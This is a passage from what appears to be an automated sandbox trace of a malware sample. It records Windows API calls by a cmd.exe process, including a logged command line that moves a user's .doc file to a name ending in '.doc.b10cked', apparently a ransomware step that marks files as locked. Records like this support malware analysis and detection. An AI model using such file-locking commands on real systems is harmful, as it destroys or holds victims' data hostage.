lpMode=0x4a9e41b0) returned 1 [0139.652] SetConsoleInputExeNameW () returned 0x1 [0139.652] GetConsoleOutputCP () returned 0x1b5 [0139.652] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.652] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.652] exit (_Code=0) Process: id = "149" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0xd40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT 
AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14526 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14527 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14528 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14529 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 14530 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14531 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14532 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14533 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14534 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14535 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15522 start_va = 0x10000 end_va = 
0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15523 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15524 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15525 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 15526 start_va = 0x600000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 15527 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15528 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15529 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15530 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15531 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15532 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 
0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15533 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15534 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15535 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15536 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15537 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15538 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15539 start_va = 0x290000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 15540 start_va = 0x3a0000 end_va = 0x3a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 15541 start_va = 0x4b0000 end_va = 0x4b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 15542 start_va = 0x4c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 15543 
start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 15544 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15545 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Thread: id = 206 os_tid = 0xd30 [0140.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fde4 | out: lpSystemTimeAsFileTime=0x28fde4*(dwLowDateTime=0x8d7615e0, dwHighDateTime=0x1d440a9)) [0140.130] GetCurrentProcessId () returned 0xd40 [0140.130] GetCurrentThreadId () returned 0xd30 [0140.130] GetTickCount () returned 0x2c051 [0140.130] QueryPerformanceCounter (in: lpPerformanceCount=0x28fddc | out: lpPerformanceCount=0x28fddc*=19691938228) returned 1 [0140.131] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.131] __set_app_type (_Type=0x1) [0140.131] __p__fmode () returned 0x76b331f4 [0140.131] __p__commode () returned 0x76b331fc [0140.131] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.131] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.131] GetCurrentThreadId () returned 0xd30 [0140.131] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd30) returned 0x38 [0140.131] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.131] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.131] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.131] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.131] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fd74 | out: phkResult=0x28fd74*=0x0) returned 0x2 [0140.132] VirtualQuery (in: lpAddress=0x28fdab, lpBuffer=0x28fd44, dwLength=0x1c | out: lpBuffer=0x28fd44*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.132] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fd44, dwLength=0x1c | out: lpBuffer=0x28fd44*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.132] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fd44, dwLength=0x1c | out: lpBuffer=0x28fd44*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.132] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fd44, dwLength=0x1c | out: lpBuffer=0x28fd44*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.132] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fd44, dwLength=0x1c | out: lpBuffer=0x28fd44*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.132] GetConsoleOutputCP () returned 0x1b5 [0140.132] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.132] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.132] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.132] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.132] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.132] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.132] _get_osfhandle (_FileHandle=1) returned 0x7 
[0140.132] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.132] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.132] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.133] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.133] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.133] GetEnvironmentStringsW () returned 0x3c0218* [0140.133] FreeEnvironmentStringsW (penv=0x3c0218) returned 1 [0140.133] GetEnvironmentStringsW () returned 0x3c0218* [0140.133] FreeEnvironmentStringsW (penv=0x3c0218) returned 1 [0140.133] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ece4 | out: phkResult=0x28ece4*=0x40) returned 0x0 [0140.133] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x0, lpData=0x28ecf0*=0xa8, lpcbData=0x28ece8*=0x1000) returned 0x2 [0140.133] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x4, lpData=0x28ecf0*=0x1, lpcbData=0x28ece8*=0x4) returned 0x0 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x0, lpData=0x28ecf0*=0x1, lpcbData=0x28ece8*=0x1000) returned 0x2 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x4, lpData=0x28ecf0*=0x0, lpcbData=0x28ece8*=0x4) returned 0x0 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x4, lpData=0x28ecf0*=0x40, lpcbData=0x28ece8*=0x4) returned 0x0 
[0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x4, lpData=0x28ecf0*=0x40, lpcbData=0x28ece8*=0x4) returned 0x0 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x0, lpData=0x28ecf0*=0x40, lpcbData=0x28ece8*=0x1000) returned 0x2 [0140.134] RegCloseKey (hKey=0x40) returned 0x0 [0140.134] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ece4 | out: phkResult=0x28ece4*=0x40) returned 0x0 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x0, lpData=0x28ecf0*=0x40, lpcbData=0x28ece8*=0x1000) returned 0x2 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x4, lpData=0x28ecf0*=0x1, lpcbData=0x28ece8*=0x4) returned 0x0 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x0, lpData=0x28ecf0*=0x1, lpcbData=0x28ece8*=0x1000) returned 0x2 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x4, lpData=0x28ecf0*=0x0, lpcbData=0x28ece8*=0x4) returned 0x0 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x4, lpData=0x28ecf0*=0x9, lpcbData=0x28ece8*=0x4) returned 0x0 [0140.134] RegQueryValueExW (in: hKey=0x40, 
lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x4, lpData=0x28ecf0*=0x9, lpcbData=0x28ece8*=0x4) returned 0x0 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x0, lpData=0x28ecf0*=0x9, lpcbData=0x28ece8*=0x1000) returned 0x2 [0140.134] RegCloseKey (hKey=0x40) returned 0x0 [0140.134] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0140.134] srand (_Seed=0x5b88636e) [0140.134] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked\"" [0140.134] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked\"" [0140.135] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.135] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3c1978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.135] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.135] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.135] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.135] _wcsicmp (_String1="PROMPT", 
_String2="CD") returned 13 [0140.135] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.135] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.135] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.135] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.135] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.135] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.135] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.135] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.136] GetEnvironmentStringsW () returned 0x3c2368* [0140.136] FreeEnvironmentStringsW (penv=0x3c2368) returned 1 [0140.136] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.136] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.136] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.136] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.136] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.136] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.136] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.136] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.136] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.136] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.136] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28fab0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.136] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28fab0, lpFilePart=0x28faac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28faac*="Desktop") returned 0x18 [0140.136] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.136] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f82c | out: lpFindFileData=0x28f82c) returned 0x3c09f8 [0140.136] FindClose (in: hFindFile=0x3c09f8 | out: hFindFile=0x3c09f8) returned 1 [0140.136] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f82c | out: lpFindFileData=0x28f82c) returned 0x3c09f8 [0140.137] FindClose (in: hFindFile=0x3c09f8 | out: hFindFile=0x3c09f8) returned 1 [0140.137] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f82c | out: lpFindFileData=0x28f82c) returned 0x3c09f8 [0140.137] FindClose (in: hFindFile=0x3c09f8 | out: hFindFile=0x3c09f8) returned 1 [0140.137] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.137] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.137] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.137] GetEnvironmentStringsW () returned 0x3c0218* [0140.137] FreeEnvironmentStringsW (penv=0x3c0218) returned 1 [0140.137] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.138] GetConsoleOutputCP () returned 0x1b5 [0140.138] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.138] GetUserDefaultLCID () returned 0x409 [0140.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28fbf0, cchData=128 | out: lpLCData="0") returned 2 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28fbf0, cchData=128 | out: lpLCData="0") returned 2 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, 
lpLCData=0x28fbf0, cchData=128 | out: lpLCData="1") returned 2 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.139] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.140] GetConsoleTitleW (in: lpConsoleTitle=0x3b0938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.140] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.140] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.140] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.141] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.141] _wcsicmp (_String1="move", _String2=")") returned 68 [0140.141] _wcsicmp (_String1="FOR", 
_String2="move") returned -7 [0140.141] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0140.141] _wcsicmp (_String1="IF", _String2="move") returned -4 [0140.142] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0140.142] _wcsicmp (_String1="REM", _String2="move") returned 5 [0140.142] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0140.146] GetConsoleTitleW (in: lpConsoleTitle=0x28f8e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.146] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0140.146] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0140.146] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0140.147] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0140.147] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0140.147] _wcsicmp (_String1="move", _String2="CD") returned 10 [0140.147] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0140.147] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0140.147] _wcsicmp (_String1="move", _String2="REN") returned -5 [0140.147] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0140.147] _wcsicmp (_String1="move", _String2="SET") returned -6 [0140.147] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0140.147] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0140.147] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0140.147] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0140.147] _wcsicmp (_String1="move", _String2="MD") returned 11 [0140.147] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0140.147] _wcsicmp (_String1="move", _String2="RD") returned -5 [0140.147] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0140.147] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0140.147] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0140.147] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0140.147] _wcsicmp 
(_String1="move", _String2="CLS") returned 10 [0140.147] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0140.147] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0140.147] _wcsicmp (_String1="move", _String2="VER") returned -9 [0140.147] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0140.147] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0140.147] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0140.147] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0140.147] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0140.147] _wcsicmp (_String1="move", _String2="START") returned -6 [0140.147] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0140.147] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0140.147] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0140.149] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.149] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.149] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f6a4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f69c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f69c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", 